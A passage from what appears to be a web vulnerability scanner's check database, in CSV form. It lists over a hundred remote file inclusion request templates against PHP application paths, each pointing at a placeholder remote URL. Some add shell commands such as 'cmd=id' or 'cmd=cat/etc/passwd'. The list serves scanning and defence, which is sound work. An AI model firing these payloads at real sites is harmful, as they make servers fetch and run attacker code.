Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004776\",\"5292\",\"c\",\"/frame.php?framefile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004777\",\"5292\",\"c\",\"/ftp.php?path_local=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004778\",\"5292\",\"c\",\"/function.inc.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004779\",\"5292\",\"c\",\"/function.php?adminfolder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004780\",\"5292\",\"c\",\"/function.php?gbpfad=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004781\",\"5292\",\"c\",\"/functions.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004782\",\"5292\",\"c\",\"/functions.php?pmp_rel_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004783\",\"5292\",\"c\",\"/functions.php?s[phppath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004784\",\"5292\",\"c\",\"/functions.php?set_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004785\",\"5292\",\"c\",\"/functions/form.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004786\",\"5292\",\"c\",\"/functions/general.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004787\",\"5292\",\"c\",\"/functions/groups.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004788\",\"5292\",\"c\",\"/functions/js.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004789\",\"5292\",\"c\",\"/functions/prepend_adm.php?SETS[path][physical]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004790\",\"5292\",\"c\",\"/functions/prepend_adm.php?SETS[path][physical]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004791\",\"5292\",\"c\",\"/functions/sections.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004792\",\"5292\",\"c\",\"/functions/users.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004793\",\"5292\",\"c\",\"/functions_mod_user.php?phpbb_root_path=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004794\",\"5292\",\"c\",\"/fusebox5.php?FUSEBOX_APPLICATION_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004795\",\"5292\",\"c\",\"/galerie.php?config[root_ordner]=@RFIURL?cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004797\",\"5292\",\"c\",\"/gallery/lib/content.php?include=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004798\",\"5292\",\"c\",\"/gallery/theme/include_mode/template.php?galleryfilesdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004799\",\"5292\",\"c\",\"/gallerypath/index.php?includepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004800\",\"5292\",\"c\",\"/games.php?id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004801\",\"5292\",\"c\",\"/games.php?scoreid=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004802\",\"5292\",\"c\",\"/gbook/includes/header.php?abspath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004803\",\"5292\",\"c\",\"/gemini/page/forums/bottom.php?lang=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004804\",\"5292\",\"c\",\"/gen_m3u.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004805\",\"5292\",\"c\",\"/genepi.php?topdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004806\",\"5292\",\"c\",\"/generate.php?ht_pfad=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004807\",\"5292\",\"c\",\"/gepi/gestion/savebackup.php?filename=@RFIURL&cmd=cat/etc/passwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004808\",\"5292\",\"c\",\"/gestArt/aide.php3?aide=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004809\",\"5292\",\"c\",\"/get_session_vars.php?path_to_smf=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004810\",\"5292\",\"c\",\"/getpage.php?page=online&doc_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004811\",\"5292\",\"c\",\"/global.php?abs_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004812\",\"5292\",\"c\",\"/gorum/dbproperty.php?appDirName=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004813\",\"5292\",\"c\",\"/gpb/include/db.mysql.inc.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004814\",\"5292\",\"c\",\"/gpb/include/db.mysql.inc.php?root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004815\",\"5292\",\"c\",\"/gpb/include/gpb.inc.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004816\",\"5292\",\"c\",\"/gpb/include/gpb.inc.php?root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004817\",\"5292\",\"c\",\"/graph.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004818\",\"5292\",\"c\",\"/gruppen.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004819\",\"5292\",\"c\",\"/handlers/email/mod.listmail.php?_PM_[path][handle]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004820\",\"5292\",\"c\",\"/handlers/page/show.php?sous_rep=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004821\",\"5292\",\"c\",\"/head.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004822\",\"5292\",\"c\",\"/header.inc.php?CssFile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004823\",\"5292\",\"c\",\"/header.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004824\",\"5292\",\"c\",\"/header.php?wwwRoot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004825\",\"5292\",\"c\",\"/help.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004826\",\"5292\",\"c\",\"/help/index.php?show=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004827\",\"5292\",\"c\",\"/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004829\",\"5292\",\"c\",\"/hioxBannerRotate.php?hm=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004830\",\"5292\",\"c\",\"/hioxRandomAd.php?hm=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004831\",\"5292\",\"c\",\"/hioxstats.php?hm=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004832\",\"5292\",\"c\",\"/hioxupdate.php?hm=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004833\",\"5292\",\"c\",\"/home.php?a=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004834\",\"5292\",\"c\",\"/home.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004835\",\"5292\",\"c\",\"/home.php?pagina=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004836\",\"5292\",\"c\",\"/home/www/images/doc/index2.php?type=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004837\",\"5292\",\"c\",\"/home1.php?ln=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004838\",\"5292\",\"c\",\"/home2.php?ln=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004839\",\"5292\",\"c\",\"/hsList.php?subdir=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004840\",\"5292\",\"c\",\"/htdocs/gmapfactory/params.php?gszAppPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004841\",\"5292\",\"c\",\"/html/admin/modules/plugin_admin.php?_settings[pluginpath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004842\",\"5292\",\"c\",\"/hu/modules/reg-new/modstart.php?mod_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004843\",\"5292\",\"c\",\"/i_head.php?home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004844\",\"5292\",\"c\",\"/i_nav.php?home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004845\",\"5292\",\"c\",\"/iframe.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004846\",\"5292\",\"c\",\"/image.php?url=@RFIURL???\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004847\",\"5292\",\"c\",\"/impex/ImpExData.php?systempath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004848\",\"5292\",\"c\",\"/import.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004849\",\"5292\",\"c\",\"/importinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004850\",\"5292\",\"c\",\"/in.php?returnpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004851\",\"5292\",\"c\",\"/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004852\",\"5292\",\"c\",\"/inc/config.inc.php?x[1]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004853\",\"5292\",\"c\",\"/inc/design.inc.php?dir[data]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004854\",\"5292\",\"c\",\"/inc/download_center_lite.inc.php?script_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004855\",\"5292\",\"c\",\"/inc/formmail.inc.php?script_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004856\",\"5292\",\"c\",\"/inc/gabarits.php?cfg_racine=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004857\",\"5292\",\"c\",\"/inc/header.inc.php?ficStyle=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004858\",\"5292\",\"c\",\"/inc/ifunctions.php?GLOBALS[phpQRootDir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004859\",\"5292\",\"c\",\"/inc/inc.php?cfg_racine=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004860\",\"5292\",\"c\",\"/inc/indexhead.php?fileloc=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004861\",\"5292\",\"c\",\"/inc/irayofuncs.php?irayodirhack=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004862\",\"5292\",\"c\",\"/inc/irayofuncs.php?irayodirhack=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004863\",\"5292\",\"c\",\"/inc/libs/Smarty_Compiler.class.php?plugin_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004864\",\"5292\",\"c\",\"/inc/libs/core/core.display_debug_console.php?plugin_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004865\",\"5292\",\"c\",\"/inc/libs/core/core.load_plugins.php?plugin_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004866\",\"5292\",\"c\",\"/inc/libs/core/core.load_resource_plugin.php?plugin_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004867\",\"5292\",\"c\",\"/inc/libs/core/core.process_cached_inserts.php?plugin_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004868\",\"5292\",\"c\",\"/inc/libs/core/core.process_compiled_include.php?plugin_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004869\",\"5292\",\"c\",\"/inc/libs/core/core.read_cache_file.php?plugin_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004870\",\"5292\",\"c\",\"/inc/linkbar.php?cfile=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004871\",\"5292\",\"c\",\"/inc/login.php?pathCGX=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004872\",\"5292\",\"c\",\"/inc/logingecon.php?pathCGX=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004873\",\"5292\",\"c\",\"/inc/ltdialogo.php?pathCGX=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004874\",\"5292\",\"c\",\"/inc/mtdialogo.php?pathCGX=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004875\",\"5292\",\"c\",\"/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004876\",\"5292\",\"c\",\"/inc/prepend.inc.php?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004877\",\"5292\",\"c\",\"/inc/service.alert.inc.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004878\",\"5292\",\"c\",\"/inc/settings.php?inc_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004879\",\"5292\",\"c\",\"/inc/settings.ses.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004880\",\"5292\",\"c\",\"/inc/shows.inc.php?cutepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004881\",\"5292\",\"c\",\"/inc/sige_init.php?SYS_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004882\",\"5292\",\"c\",\"/inc_group.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004883\",\"5292\",\"c\",\"/inc_group.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004884\",\"5292\",\"c\",\"/inc_manager.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004885\",\"5292\",\"c\",\"/inc_manager.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004886\",\"5292\",\"c\",\"/inc_newgroup.php.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004887\",\"5292\",\"c\",\"/inc_newgroup.php.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004888\",\"5292\",\"c\",\"/inc_smb_conf.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004889\",\"5292\",\"c\",\"/inc_smb_conf.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004890\",\"5292\",\"c\",\"/inc_user.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004891\",\"5292\",\"c\",\"/inc_user.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004892\",\"5292\",\"c\",\"/include.php?_APP_RELATIVE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004893\",\"5292\",\"c\",\"/include.php?gorumDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004894\",\"5292\",\"c\",\"/include.php?myng_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004895\",\"5292\",\"c\",\"/include.php?path=psp/user.php&site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004896\",\"5292\",\"c\",\"/include.php?path[docroot]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 